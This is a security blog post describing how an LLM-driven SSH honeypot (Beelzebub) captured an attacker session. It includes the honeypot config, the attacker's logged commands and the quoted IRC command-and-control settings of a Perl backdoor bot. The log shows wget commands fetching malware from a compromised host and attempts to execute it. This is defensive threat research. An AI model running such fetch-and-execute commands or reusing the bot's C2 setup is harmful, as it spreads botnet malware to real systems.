Introduction
In this article, I’ll show you how an LLM honeypot can trick a threat actor.
The threat actor, unaware of being in a honeypot, downloaded several binaries containing known exploits,
and finally attempted to execute a Perl script to connect the server to a botnet.
From the source code, I was able to retrieve useful information to access IRC channel used as a command and control server.
Honeypot configurations
The honeypot used for the analysis is Beelzebub, a low-code honeypot framework. You can configure an SSH LLM honeypot with just one configuration file. Below are the commands to download and configure it.
- Clone beelzebub examples:
$git clone https://github.com/mariocandela/beelzebub-example.git- Configure LLM SSH honeypot, just add your OpenAI key (openAISecretKey), or execute using llama.
Edit file at: configurations/services/ssh-2222.yaml
apiVersion:"v1"protocol:"ssh"address:":2222"description:"SSHLLMHoneypot"commands:-regex:"^(.+)$"plugin:"LLMHoneypot"serverVersion:"OpenSSH"serverName:"ubuntu"passwordRegex:"^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"deadlineTimeoutSeconds:120plugin:llmModel:"gpt4-o"openAISecretKey:"sk-proj-1234567890"- Execute using docker:
$docker compose up-d- Show logs:
$docker logs--follow beelzebubAnalysis
The source IP address of the threat actor is 45.175.100.69, the user and password used are admin/123456.
Following the commands executed by the threat actor and the output by the LLM honeypot:
$uname-a;uptime;nprocLinux ubuntu 5.15.0-60-generic 66-Ubuntu SMP Mon Oct 10 16:30:08 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux16:22:01 up 1:24, 2users, load average: 0.72, 0.65, 0.704$cd /tmp$wget http://deep-fm.de/tmp/files/sshd--2023-10-14 16:23:45-- http://deep-fm.de/tmp/files/sshdResolving deep-fm.de(deep-fm.de)... 192.0.2.1Connecting to deep-fm.de(deep-fm.de)|192.0.2.1|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 85647(84K)[application/octet-stream]Saving to:'sshd'sshd 100%[===================================================>] 83.64K--.-KB/sin0.04s 2023-10-14 16:23:45(2.08 MB/s) -'sshd' saved[85647/85647]$perl sshdbash: ./sshd: Permission denied$wget http://deep-fm.de/tmp/files/emech.tar.gz--2023-10-14 16:25:10-- http://deep-fm.de/tmp/files/emech.tar.gzResolving deep-fm.de(deep-fm.de)... 192.0.2.1Connecting to deep-fm.de(deep-fm.de)|192.0.2.1|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 102400(100K)[application/x-gzip]Saving to:'emech.tar.gz'emech.tar.gz 100%[===================================================>] 100.00K--.-KB/sin0.03s 2023-10-14 16:25:10(3.11 MB/s) -'emech.tar.gz' saved[102400/102400]$tarzxvf emech.tar.gzemech/emech/install.shemech/README.mdemech/bin/emech/bin/emechemech/lib/emech/lib/core.soemech/doc/emech/doc/manual.txt$lsemech emech.tar.gz sshd$ls-a. .. emech emech.tar.gz sshd$tarzxvf emech.tar.gzemech/emech/install.shemech/README.mdemech/bin/emech/bin/emechemech/lib/emech/lib/core.soemech/doc/emech/doc/manual.txt$lsemech emech.tar.gz sshd$tarxvf emech.tar.gzemech/emech/install.shemech/README.mdemech/bin/emech/bin/emechemech/lib/emech/lib/core.soemech/doc/emech/doc/manual.txt$rm-rf emech.tar.gz emech$chmod +777 sshd$lssshd$perl sshdCan't open perl script "sshd": Permission denied$ cd /var/tmp$ wget http://deep-fm.de/tmp/files/sshd--2023-10-14 16:23:45-- http://deep-fm.de/tmp/files/sshdResolving deep-fm.de (deep-fm.de)... 192.0.2.1Connecting to deep-fm.de (deep-fm.de)|192.0.2.1|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 85647 (84K) [application/octet-stream]Saving to: 'sshd'sshd 100%[===================================================>] 83.64K --.-KB/s in 0.04s $ chmod +x sshd$ perl sshdCan't open perl script"sshd": Permission denied$sudosu[sudo] passwordforuser:$123456I started analyzing the threat actor's behavior by checking the compromised site:http://deep-fm.de. The site is based on the Joomla CMS and exposes many services(old version).
The threat actor violated the system and used it as storage containing several exploits and botnet configuration scripts.
The first file downloaded by the threat actor is a perl script named sshd(http://deep-fm.de/tmp/files/sshd), the script is a backdoor that allows the threat actor to connect to the server and execute commands or DOS attacks.
The backdoor use a IRC channel as a command and control server.
From line 78 to 89 of the perl script, we can see the configuration of the IRC server and the channels used by the threat actor:
$server='ix1.undernet.org'unless$server;my$port='6667';my$linas_max='8';my$sleep='5';my$homedir="/tmp";my$version='rootbox PerlBot v2.0';my@admins=("warlock`");my@hostauth=("terr0r.users.undernet.org");my@channels=("#rootbox","#c0d3rs-TeaM");I used the information to access the IRC channel #rootbox and #c0d3rs-TeaM, the following image shows the threat actor connected to the channel #rootbox and the infected server connected.
A simple way to kill a botnet is to kill the command and control server, in this case, just close/ban the IRC channels. I reported the IRC channels to the Undernet team.
Conclusion
This is the first of a series of articles about malware analysis and threat actor behavior.
The Beelzebub team is dedicated to making the internet a better and safer place.
If you want to help us with our work, please make adonation to the Beelzebub project or contribute to thecode ❤️
Top comments(0)
For further actions, you may consider blocking this person and/orreporting abuse
